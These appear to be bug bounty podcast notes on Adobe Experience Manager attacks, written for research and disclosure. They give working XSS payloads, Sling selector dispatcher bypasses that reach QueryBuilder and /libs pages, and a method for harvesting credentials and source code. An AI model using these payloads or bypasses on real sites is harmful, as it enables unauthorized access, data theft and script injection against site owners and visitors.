[HackerNotes Ep. 176] AEM Deep Dive with Jim Green: Sling Selectors, Dispatcher Bypasses, and XSS Gadgets

Today, we deep dive into AEM with Jim Green.

Hacker TL;DR

  • Apache Sling adds two URL components on top of the standard path: selectors (between filename and extension) and suffixes (after the extension, starting with /). Both feed into Sling's resource resolution and open a massive untested attack surface

  • Three AEM core-product selectors (rawcontent, listParagraphs, form) broke nearly every unauthenticated AEM instance in the wild. Two of them are dispatcher bypasses that hand you internal endpoints like /bin/querybuilder.json

  • AEM permissions ship with a footgun: the anonymous user is part of the everyone group by default, so every "open to all users" rule also applies to unauthenticated visitors

  • Three reusable XSS primitives outside AEM: moment.js format injection via square brackets, jQuery .text() re-decoding HTML entities, and javascript: URIs populating both hostname and pathname on the URL object

Today’s Sponsor: Adobe. Earn more for AI bugs with Adobe’s new AI Tier! https://blog.adobe.com/security/adobe-expands-bug-bounty-program-to-incentivize-ai-security-research

Also, don’t forget to grab a 10% bonus for valid AI vulnerabilities in Adobe Stock and Lightroom Web.

Use code: CTBB063026 in your report.
Expires June 30, 2026.

In the News

Who's Jim Green

Jim Green (@GreenJamSec) spent 20 years in software development, mainly on banking systems, before transitioning to bug bounty full time in October 2025. He learned AEM as a consultant building customer implementations on top of the platform, then carried that internal knowledge into the Adobe VIP program where he now has 600+ CVEs to his name (overwhelmingly XSS). Jim is also the HackerOne UK Brand Ambassador alongside Nathan Jones (NJCVE).

Bring a Bug: MasterCard, QueryBuilder, and the etc/packages Heist

Jim's first paid bug was on an AEM instance with QueryBuilder exposed (behind a trivial WAF bypass). QueryBuilder is the internal search interface for the Java Content Repository, normally locked down for developer use only. Once accessible, he pivoted into /etc/packages, which stores the deployment artifacts for the customer's own code sitting on top of AEM.

The packages contained:

  • Full source code for the customer's implementation

  • Plaintext credentials for their internal MySQL database

  • Akamai API keys (full WAF rule control, potential origin pivoting)

The structural lesson: every time AEM is deployed via CI/CD or through the Package Manager web UI, the resulting zip lands under /etc/packages. If permissions there are loose, the entire codebase is downloadable. Also worth noting: crx-quickstart/install/ turns an arbitrary file write into RCE. Drop a deployable zip there, and AEM installs it on next restart.

AEM Architecture

  • Author instance - internal CMS where editors and devs work. Replication agents push approved content to publishers

  • Publish instance - public-facing. Hosts the actual rendered pages

  • Dispatcher - Apache HTTPD reverse proxy in front of publish, handles caching, load balancing, and (often) ACLs

  • WAF - usually Akamai or similar, sitting in front of the dispatcher

Two AEM deployment flavors matter for hunting. AMS (Adobe Managed Services) is the on-prem/self-hosted version, possibly hosted by Adobe on AWS. AEM as a Cloud Service is the SaaS version, more locked down (admins cannot write to executable paths, no easy RCE primitives). For spraying core-product bugs, AMS instances are where you score.

Inside the JCR, the folder layout to memorize:

  • /libs - Adobe's core product code (JSPs, HTLs, servlets)

  • /apps - customer overrides and custom implementations

  • /etc/packages - deployment artifacts

  • /content - the actual web pages

  • /content/dam - assets (images, PDFs, sometimes spreadsheets with PII)

Pro Tip on /content: Jim regularly finds employee lists with SSNs, plaintext credentials, IP inventories of internal architecture, and documents marked "strictly confidential" living under /content. Authors use AEM as a convenient file transfer mechanism. Worth checking on every black-box AEM instance.

Apache Sling URL Anatomy

This is the unique-to-AEM part most hunters miss. Sling extends a normal URL with two extra fields:

scheme://host/path/filename.selector1.selector2.extension/suffix?query#fragment

  • Selectors sit between the filename and the extension. You can chain multiple

  • Suffix comes after the extension and starts with /. Often a path, but free-form

Concrete example: /content/page.list.html/sub/path resolves to the resource /content/page with selector list, extension html, suffix /sub/path.
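
To make the decomposition concrete, here is a minimal sketch of how a path splits into those four pieces. parseSlingPath is a hypothetical helper, not Sling's actual resolver. It assumes the resource path itself contains no dots, whereas real Sling checks which resource actually exists in the repository before deciding where the selectors begin.

```javascript
// Simplified sketch: split a Sling-style path into its components.
// Assumption: the resource path has no "." in it (real Sling resolves
// against the repository, so this is only an approximation).
function parseSlingPath(pathname) {
  const firstDot = pathname.indexOf('.');
  if (firstDot === -1) {
    return { resourcePath: pathname, selectors: [], extension: null, suffix: null };
  }
  const resourcePath = pathname.slice(0, firstDot);
  const rest = pathname.slice(firstDot + 1);

  // Everything up to the next "/" is "selector(s).extension";
  // everything from that "/" onward is the suffix.
  const slash = rest.indexOf('/');
  const dotted = slash === -1 ? rest : rest.slice(0, slash);
  const suffix = slash === -1 ? null : rest.slice(slash);

  const parts = dotted.split('.');
  const extension = parts.pop(); // last dotted segment is the extension
  return { resourcePath, selectors: parts, extension, suffix };
}

console.log(parseSlingPath('/content/page.list.html/sub/path'));
```

Running the same helper over the URLs in the bug sections below is a quick way to see which part of a request is the selector and which part is the suffix.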

Sling's resource resolution decides which servlet handles the request using an order of precedence:

  1. Java servlet registered with an exact path (this is how /bin/querybuilder.json works)

  2. Java servlet registered by combination of sling:resourceType, selector, primary type, or extension

  3. sling:resourceType pointing to a JSP or HTL in /apps

  4. Same lookup falling through to /libs if /apps does not override

  5. DefaultGetServlet as the catch-all (this is how .infinity.json works to recursively dump nodes)

The selectors at level 2 are where Jim's bugs live. AEM ships with built-in core selectors registered on common patterns (e.g., CQ Page + .html extension), and customers can register their own. Both surfaces are underexplored.

Bug 1: The rawcontent Selector (CVE-2022-30677)

Registered on CQ Page with .html extension. Original purpose: strip JavaScript and CSS so content could be exported to other systems.

/path/to/page.rawcontent.html

The implementation used an unsafe HTML serializer, so any stored content with previously-sanitized HTML escapes got re-emitted as raw HTML. Result: stored XSS on any author-controllable content.

The reflection variant was the real prize. The default 404 page reflects the requested path. Append .rawcontent to a non-existent route and the reflected path renders as raw HTML. That was unauthenticated reflected XSS on every AEM instance in the wild that did not have a custom 404 page or dispatcher rules blocking 404s.

When custom 404s started killing the primitive, Jim fuzzed for a paired selector and found savedsearch, which triggers a 400 error with the path reflected. Chaining savedsearch.rawcontent revived the gadget on instances that only blocked 404s, since most customers do not override the 400 page.

When one selector gets walled off by dispatcher rules, fuzz for a second selector that produces the same reflection but on a different error path. Multiple selectors are valid and pass through Sling's resolution in order.

Today, rawcontent still exists and still removes JS and CSS, but the HTML serializer was swapped from htmlwriter to html5-serializer, which preserves sanitization. The edge case Jim noted: if you already have HTML injection elsewhere but JavaScript on the page overrides your sink (e.g., a form action being rewritten on load), rawcontent strips the JS and lets your injection stand.

Bug 2: The listParagraphs Selector (CVE-2022-42351 / CVE-2022-42348)

Same trigger as rawcontent (CQ Page + .html), but it accepts an itemResourceType query parameter that internally re-renders against an arbitrary resource type.

/content/path/page.listParagraphs.html?itemResourceType=/libs/cq/statistics/components/queries-by-result/html.jsp&limit=1&path=<XSS>

What this is: a generic dispatcher bypass. Resource types under /libs are not directly reachable by the dispatcher in well-configured instances. But because Sling resolves the resource internally and Sling permissions are evaluated server-side (not at the dispatcher), listParagraphs will happily render /libs JSPs that an external attacker should never be able to reach.

Two ways to weaponize it:

  1. Point it at QueryBuilder. Set itemResourceType to /libs/cq/statistics/components/queries-by-result/html.jsp, get a list of nodes back with juicy metadata. You now have a backdoor into the JCR even when QueryBuilder is dispatcher-blocked

  2. Point it at any vulnerable /libs JSP. Jim found a reflected XSS in queries-by-result/html.jsp via the path query parameter. Stack it on top of listParagraphs and you get unauthenticated reflected XSS

Bug 3: The form Selector (CVE-2024-26029)

Originally found by LPI and submitted as a collaboration. The servlet was registered on the form selector against the sling/servlet/default resource type with no extension restriction, so it matched every node in the JCR regardless of file extension.

/content/dam.form.css/bin/querybuilder.json

Anatomy:

  • .form is the selector that activates the gadget

  • .css is a throwaway extension. AEM ignores it, and dispatchers often allow .css requests where they would block .json or .html

  • /bin/querybuilder.json is the suffix. The form servlet internally forwards the suffix as the new path, so AEM ends up processing the request as if it were just /bin/querybuilder.json

The suffix is what makes this a dispatcher bypass. Whatever rule blocks /bin/querybuilder.json at the dispatcher level sees only the prefix path, not the suffix. Once Sling takes over, the suffix becomes the actual target.
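
A rough sketch of why a prefix-based rule misses this. Both functions are hypothetical stand-ins: naiveDispatcherAllows is not real dispatcher filter syntax, and forwardedTarget only mimics the forwarding behavior described above. The denied prefixes are illustrative assumptions.

```javascript
// Hypothetical stand-in for a dispatcher rule that denies by path prefix.
function naiveDispatcherAllows(pathname) {
  const deniedPrefixes = ['/bin/', '/libs/', '/etc/packages'];
  return !deniedPrefixes.some((prefix) => pathname.startsWith(prefix));
}

// Sketch of the behavior described for the form servlet: the suffix
// (everything after ".form.<ext>") becomes the path that is processed.
function forwardedTarget(pathname) {
  const match = pathname.match(/^[^.]*\.form\.[^./]+(\/.*)$/);
  return match ? match[1] : null;
}

const request = '/content/dam.form.css/bin/querybuilder.json';
console.log(naiveDispatcherAllows('/bin/querybuilder.json')); // direct hit is blocked
console.log(naiveDispatcherAllows(request));                  // wrapped request passes
console.log(forwardedTarget(request));                        // what AEM ends up serving
```

The rule and the servlet disagree about what the "path" of the request is, and that gap is the whole bug.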

Chaining bugs 2 and 3:

# Request sent (dispatcher only sees .form.js, lets it through):
/content/site/us/en/page.form.js/content/site/us/en/page.listParagraphs.html?itemResourceType=/libs/cq/statistics/components/queries-by-result/html.jsp&path=<XSS>

# Internally forwarded by the form servlet (suffix becomes the path):
/content/site/us/en/page.listParagraphs.html?itemResourceType=/libs/cq/statistics/components/queries-by-result/html.jsp&path=<XSS>

The form selector bypasses any rule blocking .listParagraphs at the dispatcher, then listParagraphs bypasses any rule blocking /libs access. Query parameters pass through both layers. Unauthenticated XSS through two layers of dispatcher hardening.

Methodology: Black-Box Hunting on AEM Instances

Phase 1: Confirm AEM and version

  • Hit common AEM paths: /libs/granite/core/content/login.html, /etc.clientlibs/, /system/console

  • Tag the listParagraphs selector onto any existing page and point itemResourceType at the AEM about page (/libs/granite/ui/components/shell/help/about/about.jsp&limit=1). It returns the AEM version and doubles as a fingerprint check Jim said he runs through nuclei

  • Watch for /etc/clientlibs vs /etc.clientlibs in the page source. The dotted form is the modern proxy version, the slashed form is legacy and suggests /etc is open for reads

Phase 2: Test the unauthenticated primitives

  • .rawcontent paired with .savedsearch on non-existent paths for reflected XSS in the 400/404 page

  • .listParagraphs.html?itemResourceType= pointing at known vulnerable /libs resources from Jim's CVE list

  • .form.<ext>/bin/querybuilder.json?path=/&p.limit=10 for QueryBuilder access through the suffix dispatcher bypass
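
The Phase 1 and Phase 2 checks can be sketched as a small URL builder for an in-scope target. buildProbeUrls is a hypothetical helper, and the non-existent page name plus the choice of .css as the throwaway extension are assumptions for illustration. The selectors and /libs paths are the ones quoted in these notes.

```javascript
// Sketch: assemble the probe URLs described above for one known page.
// Assumptions: "ctbb-missing-page" is just an arbitrary non-existent path,
// and ".css" is used as the throwaway extension for the form selector.
function buildProbeUrls(origin, pagePath) {
  const base = origin.replace(/\/+$/, ''); // drop trailing slashes
  const queriesJsp = '/libs/cq/statistics/components/queries-by-result/html.jsp';
  const aboutJsp = '/libs/granite/ui/components/shell/help/about/about.jsp';
  return {
    // Phase 1: version fingerprint through listParagraphs
    version: `${base}${pagePath}.listParagraphs.html?itemResourceType=${aboutJsp}&limit=1`,
    // Phase 2: path reflection in the 400/404 page
    errorReflection: `${base}/ctbb-missing-page.savedsearch.rawcontent.html`,
    // Phase 2: /libs JSP rendered through listParagraphs
    listParagraphs: `${base}${pagePath}.listParagraphs.html?itemResourceType=${queriesJsp}&limit=1`,
    // Phase 2: QueryBuilder through the suffix bypass
    formSuffix: `${base}/content/dam.form.css/bin/querybuilder.json?path=/&p.limit=10`,
  };
}

console.log(buildProbeUrls('https://target.example/', '/content/site/us/en/page'));
```

target.example and the page path are placeholders. Swap in a page you have confirmed exists, since listParagraphs needs a real CQ Page to hang off.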

Phase 3: Mine content for sensitive data

  • Once QueryBuilder is reachable, walk the JCR. Start with .1.json selectors to enumerate top-level folders without tripping the 10,000-node limit

  • Drill down into folders that look internal. Look for spreadsheets, "do not publish" drafts, plaintext credentials, architecture documents

  • For financial institutions: pre-disclosure earnings reports staged in /content before public release would be insider-trading-grade impact

Phase 4: Look for custom selectors

The three selectors covered here are the publicly-documented ones. AEM customers can register their own selectors, and these are essentially unaudited surface. Source-code review (after grabbing /etc/packages) of @SlingServlet annotations and resourceTypes registrations is the path to fresh bugs.
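
As a starting point for that review, a regex pass over decompiled or extracted Java source can list registered selectors. This is a rough sketch: findSelectors is a hypothetical helper, and it only recognizes two common registration shapes (a selectors = ... annotation attribute and a sling.servlet.selectors=... OSGi property string). Anything built dynamically will be missed.

```javascript
// Sketch: pull selector names out of Java source text.
// Assumption: registrations look like one of the two patterns below.
function findSelectors(javaSource) {
  const found = new Set();

  // Annotation attribute: selectors = "foo"  or  selectors = {"foo", "bar"}
  const attribute = /selectors\s*=\s*(\{[^}]*\}|"[^"]*")/g;
  for (const match of javaSource.matchAll(attribute)) {
    for (const name of match[1].matchAll(/"([^"]+)"/g)) {
      found.add(name[1]);
    }
  }

  // OSGi component property: "sling.servlet.selectors=foo"
  const property = /sling\.servlet\.selectors=([^"]+)"/g;
  for (const match of javaSource.matchAll(property)) {
    found.add(match[1].trim());
  }

  return [...found].sort();
}

const sample = `
@SlingServlet(resourceTypes = "sling/servlet/default", selectors = "form", methods = "GET")
public class ExampleA {}
@Component(property = { "sling.servlet.selectors=export", "sling.servlet.extensions=html" })
public class ExampleB {}
`;
console.log(findSelectors(sample));
```

Pair each hit with the resource type and extension on the same registration. A selector bound to sling/servlet/default with no extension restriction is the same shape as the form bug.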

Where to Put the Security Controls

Jim's view on layering security:

  • ACLs at the JCR level are the only real control. Apply restrictive permissions on /libs, /etc, internal /content paths

  • Dispatcher rules are not a security control. The dispatcher is a cache and proxy with a security-adjacent rule engine. Its rules are typically written against the raw path and miss selector/suffix manipulations

  • WAF rules are useful for incident response (block these selectors right now while we patch) but should not be the primary defense

The real mitigation for all three bugs is to upgrade AEM. Dispatcher-level blocks of the .rawcontent, .listParagraphs, and .form selectors are stopgaps that fall to alternative selectors, chained selectors, or path-encoding tricks.

Bonus: Three Underrated XSS Gadgets

Jim shipped three POC pages on his domain that demonstrate sink primitives worth keeping in your hunting checklist.

moment.js Format Injection

If user input controls the format argument to moment().format() and the output lands in innerHTML, you have XSS. moment.js supports literal strings in format patterns via square brackets:

moment().format("[<img src=x onerror=alert(document.domain)>]")

The brackets tell moment to emit the contents verbatim instead of treating them as date tokens. Jim had dismissed this as not exploitable for years before Claude insisted it was vulnerable and built the POC. moment.js is deprecated but still extremely common.

POC: https://poc.greenjam.co.uk/just-a-moment.html?date=2026-05-07&format=[<img src=x onerror=alert(document.domain)>]
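
On the defensive side, one possible guard is to constrain the format string before it ever reaches moment. This is a minimal sketch, not something from the episode. SAFE_FORMAT and safeFormatOrDefault are hypothetical names, and the allowed character set is an assumption you would tune to the formats your app really needs. Writing the result with textContent instead of innerHTML is the more fundamental fix.

```javascript
// Sketch: accept only a small set of date-token characters and separators.
// Square brackets and angle brackets are deliberately absent from the
// character class, so literal-text escapes are rejected outright.
const SAFE_FORMAT = /^[YMDdHhmsSAaZ :\/.,-]{1,40}$/;

function safeFormatOrDefault(userFormat, fallback = 'YYYY-MM-DD') {
  const ok = typeof userFormat === 'string' && SAFE_FORMAT.test(userFormat);
  return ok ? userFormat : fallback;
}

console.log(safeFormatOrDefault('YYYY-MM-DD HH:mm'));
console.log(safeFormatOrDefault('[<img src=x onerror=alert(document.domain)>]'));
```

When hunting, the inverse applies: any endpoint that accepts a format parameter and tolerates [ and ] is worth a closer look.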

jQuery .text() Re-Decoding Entities

Jim's POC sanitizes input through DOMPurify, wraps the result in a <div>, calls .text() on it, then writes the text into innerHTML:

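// Intentionally vulnerable flow from the POC
const cleanValue = DOMPurify.sanitize(value);        // entity-encoded payload passes through as text
const $clean = $('<div>' + cleanValue + '</div>');   // the HTML parser decodes the entities here
const text = $clean.text();                          // returns the decoded string: <img src=x ...>
document.getElementById('output').innerHTML = text;  // decoded string is re-parsed as HTML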

The bypass: send an entity-encoded payload like &lt;img src=x onerror=alert(document.domain)&gt;. DOMPurify treats the entities as literal text and passes them through unchanged. When jQuery builds the <div>, the browser HTML parser decodes the entities into the div's text content. .text() then reads that text back as the raw string <img src=x onerror=...>, and writing it to innerHTML re-parses it as HTML and fires.

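The pattern shows up anywhere code "sanitizes once, reuses many times." .text(), .val(), and .textContent all return the already-decoded text rather than the original markup, so entities that were inert in the sanitized string come back as live angle brackets. Always check what happens to sanitized output when it gets read back.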

POC: https://poc.greenjam.co.uk/text-xss.html

javascript: URIs Populate hostname AND pathname

The pod has already covered that new URL("javascript://example.com") returns hostname === "example.com". The less-known extension: pathname, port, hash, and searchParams also get populated.

// The newline is percent-encoded (%0a): the URL parser strips a raw newline from its input.
const u = new URL("javascript://example.com:443/anything?key=val#frag%0aalert(document.domain)");
// u.hostname === "example.com"
// u.pathname === "/anything"
// u.port     === "443"
// u.searchParams.get("key") === "val"

Jim's POC parses the input as new URL(value), validates hostname === 'example.com' and pathname.startsWith('/anything'), then calls window.open(value) with the raw user-controlled string. The bypass: in a javascript: URI, the // right after the scheme starts a single-line JavaScript comment that absorbs the host and path tokens. A %0a is decoded to a newline when the URI is executed, which ends the comment, and whatever follows runs.
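
A minimal sketch of the difference between the check described above and one that also pins the scheme. naiveCheck mirrors the POC's validation as described in these notes. stricterCheck is a hypothetical alternative, not Jim's code, and it returns the normalized href so the caller never opens the raw input.

```javascript
// Mirrors the validation described above: host and path only.
function naiveCheck(value) {
  const u = new URL(value);
  return u.hostname === 'example.com' && u.pathname.startsWith('/anything');
}

// Hypothetical stricter variant: pin the scheme first, then host and path,
// and hand back the parsed URL's href instead of the raw string.
function stricterCheck(value) {
  let u;
  try {
    u = new URL(value);
  } catch {
    return null; // not a parseable absolute URL
  }
  if (u.protocol !== 'https:') return null;
  if (u.hostname !== 'example.com') return null;
  if (!u.pathname.startsWith('/anything')) return null;
  return u.href;
}

const payload = 'javascript://example.com/anything%0aalert(document.domain)';
console.log(naiveCheck(payload));    // passes the host/path validation
console.log(stricterCheck(payload)); // rejected on scheme
```

For hunting, the takeaway is to try a javascript: URI against any redirect or window.open sink whose validation inspects hostname or pathname but never protocol.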

Resources

That's it for the week, keep hacking!